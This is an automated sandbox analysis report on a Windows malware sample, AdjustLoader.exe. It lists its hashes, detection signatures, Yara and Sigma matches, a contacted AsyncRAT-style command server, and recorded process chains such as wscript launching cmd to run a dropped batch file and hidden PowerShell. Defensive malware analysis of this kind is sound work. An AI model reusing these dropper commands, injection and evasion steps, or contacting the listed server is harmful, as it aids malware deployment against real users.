Windows Analysis Report
AdjustLoader.exe

Overview

General Information

Sample name: AdjustLoader.exe
Analysis ID: 1502262
MD5: 256f033589595c9d3b595bc844282381
SHA1: a44eac7e3b61186905bdcbe20af5cf949a287f01
SHA256: 65a64d52cf39dc7f6c1089971c8813ce02bfc601137dcf0b776b7302d52bde65
Tags: exe

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Creates a thread in another existing process (thread injection)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powerup Write Hijack DLL
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

Source: AdjustLoader.exe Virustotal: Detection: 20%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: AdjustLoader.exe Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 51_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 51_2_00401000
Source: unknown HTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: AdjustLoader.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Configuration.Install.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Data.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Xml.pdbp source: WER8844.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbH source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: C:\Users\admin\source\repos\Uni2\Uni2\obj\x64\Release\Uni2.pdb source: AdjustLoader.exe
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.DirectoryServices.pdb source: WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Core.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Numerics.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Management.pdb source: WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.DirectoryServices.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Configuration.Install.pdb4 source: WER4655.tmp.dmp.45.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: mscorlib.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Xml.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdbP source: WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.DirectoryServices.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Configuration.Install.pdb` source: WER8844.tmp.dmp.11.dr
Source: Binary string: System.Configuration.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.DirectoryServices.pdbh source: WER4655.tmp.dmp.45.dr
Source: Binary string: System.Configuration.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Data.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Data.ni.pdbRSDSC source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.Security.pdbjS source: WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Xml.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Management.Automation.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.CSharp.pdb%N source: WER4655.tmp.dmp.45.dr
Source: Binary string: System.Data.pdbH source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Management.Automation.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER4655.tmp.dmp.45.dr
Source: Binary string: mscorlib.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Management.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Management.Automation.pdb3 source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: mscorlib.pdbPYW source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Management.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Core.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Transactions.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Configuration.pdbH source: WER4655.tmp.dmp.45.dr
Source: Binary string: System.Core.pdbiy source: WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Transactions.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Numerics.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr
Source: Binary string: System.Numerics.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: C:\Windows\System32\conhost.exe Code function: 47_2_0000024D9FF7D834 FindFirstFileExW, 47_2_0000024D9FF7D834
Source: C:\Windows\System32\conhost.exe Code function: 47_2_0000024D9FF7D9B8 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 47_2_0000024D9FF7D9B8

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Network traffic Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 83.143.112.51:6000 -> 192.168.2.4:49747
Source: global traffic TCP traffic: 192.168.2.4:49747 -> 83.143.112.51:6000
Source: Joe Sandbox View IP Address: 195.201.57.90
Source: Joe Sandbox View ASN Name: INTERNETIA_ETTH2-ASNoc-BialystokPL
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: ipwho.is
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 Host: ipwho.is Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 83.143.112.51
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: ipwho.is
Source: lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 00000039.00000000.2382252553.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000039.00000000.2382818082.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: powershell.exe, 00000012.00000002.2239343406.0000013870247000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000012.00000002.2239343406.0000013870247000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro/pki/crl/productCerAut_2010-06-2
Source: lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 00000039.00000000.2382252553.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000039.00000000.2382818082.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 00000039.00000000.2382454230.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 00000039.00000000.2382252553.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000039.00000000.2382818082.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: lsass.exe, 00000039.00000000.2382252553.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000039.00000000.2382454230.00000202C0200000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000039.00000000.2382136485.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382252553.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000039.00000000.2382454230.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 00000039.00000000.2382818082.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 00000039.00000000.2382818082.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382454230.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000034.00000002.2412537016.000002D0D537B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000012.00000002.2020721365.00000138001BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000008.00000002.2018154793.0000027B00001000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020721365.0000013800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2403335664.0000025800001000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2407283977.0000000004AC0000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2412537016.000002D0D5151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000039.00000000.2382136485.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: powershell.exe, 00000012.00000002.2020721365.00000138001BA000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: Amcache.hve.11.dr String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000034.00000002.2412537016.000002D0D537B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 00000039.00000000.2382818082.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0~
Source: powershell.exe, 00000012.00000002.2242069993.00000138702D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000008.00000002.2018154793.0000027B00001000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2403335664.0000025800001000.00000004.00000001.00020000.00000000.sdmp, conhost.exe, 0000002F.00000002.2587997182.0000024D9FD4C000.00000004.00000020.00020000.00000000.sdmp, Null.39.dr, Null.8.dr String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000008.00000002.2018154793.0000027B00001000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020721365.0000013800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2403335664.0000025800001000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2412537016.000002D0D5151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000002E.00000002.2407283977.0000000004AC9000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2407283977.0000000004ADC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBqq
Source: powershell.exe, 00000008.00000002.2018154793.0000027B00001000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2403335664.0000025800001000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6xGa
Source: powershell.exe, 00000012.00000002.2020721365.00000138001BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020721365.0000013800DD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020721365.0000013800C61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020721365.0000013800DFE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000012.00000002.2020721365.0000013800DD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020721365.0000013800DFE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: powershell.exe, 00000034.00000002.2412537016.000002D0D537B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000012.00000002.2020721365.0000013801152000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2412537016.000002D0D62A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown HTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.4:49748 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Windows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary

Source: Process Memory Space: powershell.exe PID: 7808, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5796, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: unknown Process created: Commandline size = 5450
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$nya-onimai3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$nya-onimai3\$nya-Loli.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$nya-onimai3\$nya-Loli.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_eq4drbh0.jzz.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7808 -s 2540
Source: AdjustLoader.exe Static PE information: No import functions for PE file found
Source: AdjustLoader.exe, 00000000.00000000.1648948419.000001C8DB03B000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameUni2.exe* vs AdjustLoader.exe
Source: AdjustLoader.exe Binary or memory string: OriginalFilenameUni2.exe* vs AdjustLoader.exe
Source: Process Memory Space: powershell.exe PID: 7808, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5796, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.spyw.expl.evad.winEXE@77/37@1/2
